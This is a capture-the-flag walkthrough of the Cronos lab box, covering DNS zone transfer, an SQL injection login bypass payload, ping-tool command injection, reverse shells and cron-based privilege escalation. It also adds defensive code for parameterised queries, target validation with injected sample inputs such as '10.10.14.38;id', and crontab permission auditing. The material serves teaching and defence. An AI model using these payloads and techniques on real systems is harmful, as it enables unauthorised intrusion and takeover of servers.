We perform a zone transfer with dig and find a virtual host for the admin page, whose login form is vulnerable to SQL injection.
Once logged in, we send the request through Burp and find command execution in a tool that performs ping and traceroute, then get a reverse shell using Python.
We notice that root executes a PHP script every minute, and that script is owned by our user, www-data. Replacing the PHP script with our own code gives us root.
Tools used:
nmap, dig, burp
Nmap
# Nmap 7.80 scan initiated Tue Apr 14 22:04:44 2020 as: nmap -sC -sV -p 22,53,80 -oA nmap/cronos_all 10.10.10.13
Nmap scan report for 10.10.10.13
Host is up (0.056s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 14 22:04:59 2020 -- 1 IP address (1 host up) scanned in 15.48 seconds
# dig axfr cronos.htb @10.10.10.13
; <<>> DiG 9.11.16-2-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 56 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 14 22:30:14 EDT 2020
;; XFR size: 7 records (messages 1, bytes 203)
The interesting record here is admin.cronos.htb, a virtual host we would not have found by browsing to the IP address alone.
HTTP
On the admin page, we tried guessing a few usernames and passwords but got nothing. However, when we tried a few SQLi payloads, we were able to log in using the following:
Username: admin' #
Password: admin
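The payload above works because the quote closes the username literal and the comment marker discards the rest of the WHERE clause, including the password check. The following is an added example, not code from the writeup or from the box's application, showing the string-built login query beside a parameterised one. It uses an in-memory SQLite table with a constructed sample credential; SQLite only knows `--` as a line comment, whereas MySQL (which the page's login suggests) additionally accepts `#`, so the demo payload uses `--`.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample credential; nothing here is taken from the real box.
SAMPLE_USER = "admin"
SAMPLE_PASSWORD = "constructed-sample-password"
SALT = os.urandom(16)


def pw_hash(password: str, salt: bytes) -> str:
    """PBKDF2-SHA256 so the table never holds a recoverable password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the admin page's user table.

    The plaintext column exists only so the vulnerable query can be shown the
    way the page's login plausibly worked; the hardened path never reads it.
    """
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT, salt BLOB, pw_hash TEXT)"
    )
    con.execute(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        (SAMPLE_USER, SAMPLE_PASSWORD, SALT, pw_hash(SAMPLE_PASSWORD, SALT)),
    )
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: whatever the user types becomes SQL syntax."""
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return con.execute(query).fetchone() is not None


def login_hardened(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameter: quotes and comment markers in the input stay data.

    The password check moves out of SQL into a constant-time hash comparison.
    """
    row = con.execute(
        "SELECT salt, pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(pw_hash(password, salt), stored)


# SQLite knows only '--' as a line comment; MySQL additionally accepts '#',
# which is the form the page's login accepted.
BYPASS_USERNAME = "admin' --"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, bypass :", login_vulnerable(con, BYPASS_USERNAME, "anything"))
    print("hardened,   bypass :", login_hardened(con, BYPASS_USERNAME, "anything"))
    print("hardened,   valid  :", login_hardened(con, SAMPLE_USER, SAMPLE_PASSWORD))
```

With the same input, `login_vulnerable` returns True for any password while `login_hardened` returns False; only the real credential passes the hardened path.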
Once logged in, we are redirected to a tool that allows us to ping and traceroute.
A simple test shows that we can ping our box.
On our Kali box, we can see the ICMP packets arrive in tcpdump.
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
00:35:40.334101 IP 10.10.10.13 > 10.10.14.38: ICMP echo request, id 31905, seq 1, length 64
00:35:40.334126 IP 10.10.14.38 > 10.10.10.13: ICMP echo reply, id 31905, seq 1, length 64
Exploit
We send this ping request to Burp and notice that we have command execution.
Request
Response
Using a Python reverse shell as the payload, we get a shell as user www-data.
www-data@cronos:/var/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www$
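The ping tool's command execution comes from pasting the user-supplied target into a shell command line. The following is an added example, not code from the writeup or from the box's application, that contrasts that pattern with a version a defender would ship: the target is accepted only if it parses as an IP address or a plain hostname, and ping is started from an argv list so no shell ever sees the input. The hostname regex, the function names and the sample targets are this example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens with no
# leading hyphen, so nothing a shell or ping would read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(target: str) -> str:
    """The anti-pattern behind the finding: user input pasted into a shell string.

    Handed to shell=True (or PHP's exec()/shell_exec()), any shell metacharacter
    in `target` ends the ping and starts a second command.
    """
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Return the target if it is an IP address or a plain hostname, else raise."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected target: {target!r}")


def is_safe_target(target: str) -> bool:
    """Boolean wrapper around validate_target for callers that just need yes/no."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def ping_argv(target: str) -> list[str]:
    """argv for ping; a list never passes through a shell, so nothing is re-parsed."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str, timeout: float = 5.0) -> str:
    """Run the validated ping without a shell and return its combined output."""
    proc = subprocess.run(
        ping_argv(target), capture_output=True, text=True, timeout=timeout
    )
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed sample inputs: two legitimate targets and two that must be refused.
    for t in ("10.10.14.38", "www.cronos.htb", "10.10.14.38;id", "-c 100 10.10.14.38"):
        print(f"{t!r:24} safe={is_safe_target(t)!s:6} shell-string={vulnerable_command(t)!r}")
```

The validation is an allow-list, not a blacklist of metacharacters: anything that is not an address or a hostname is refused, which also covers option injection such as a target beginning with `-`.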
Privilege Escalation
Doing some enumeration on the box with linpeas.sh, the following jumped out.
The file is owned by our user and is executed by root every minute. With that information, we replaced artisan with a PHP reverse shell and got a shell as root.
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9008
Ncat: Listening on 0.0.0.0:9008
Ncat: Connection from 10.10.10.13.
Ncat: Connection from 10.10.10.13:33386.
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
07:25:01 up 2:34, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
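The root cause of the privilege escalation is a file that root executes on a schedule but that a lower-privileged user can modify. The following is an added example, not code from the writeup or from linpeas.sh, of the check an administrator would run over a system crontab: for every entry that runs as root, each absolute path in the command is inspected for non-root ownership and for group/world write permission. The crontab text, the script path and the temporary file it audits are constructed for the demo and are not the box's real cron entry.

```python
import os
import re
import shlex
import stat
import tempfile

# Constructed /etc/crontab header; the scheduled line is appended in demo().
SAMPLE_CRONTAB_HEADER = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def parse_entry(line: str):
    """Return (user, command) for a system-crontab line, or None for blanks, comments and env lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    if line.startswith("@"):          # @reboot, @hourly, ...: one schedule field
        parts, need = line.split(None, 2), 3
    else:                             # m h dom mon dow: five schedule fields
        parts, need = line.split(None, 6), 7
    if len(parts) < need:
        return None
    return parts[-2], parts[-1]


def command_paths(command: str) -> list[str]:
    """Absolute paths named in the command, ignoring anything after a redirection."""
    command = re.split(r"\s+\d*[<>]", command)[0]
    try:
        tokens = shlex.split(command)
    except ValueError:                # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def audit_path(path: str) -> list[str]:
    """Flag a file root will execute that a non-root user could replace or edit."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: does not exist"]
    findings = []
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world writable ({stat.filemode(st.st_mode)})")
    return findings


def audit_crontab(text: str) -> list[str]:
    """Audit every root entry of a system crontab and return the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        user, command = entry
        if user != "root":
            continue
        for path in command_paths(command):
            findings.extend(audit_path(path))
    return findings


def demo() -> list[str]:
    """Create a world-writable stand-in for the scheduled script and audit a constructed crontab."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "artisan")      # placeholder path, not the box's
        with open(script, "w") as fh:
            fh.write("<?php // constructed placeholder\n")
        os.chmod(script, 0o666)
        crontab = SAMPLE_CRONTAB_HEADER + (
            f"* * * * * root php {script} schedule:run >> /dev/null 2>&1\n"
        )
        return audit_crontab(crontab)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against a real `/etc/crontab` (and the files under `/etc/cron.d`), the same function reports any root-scheduled script that a service account such as www-data owns or can write to, which is exactly the condition the writeup exploited; the interpreter itself (`php` here) is resolved through PATH and would need a separate check.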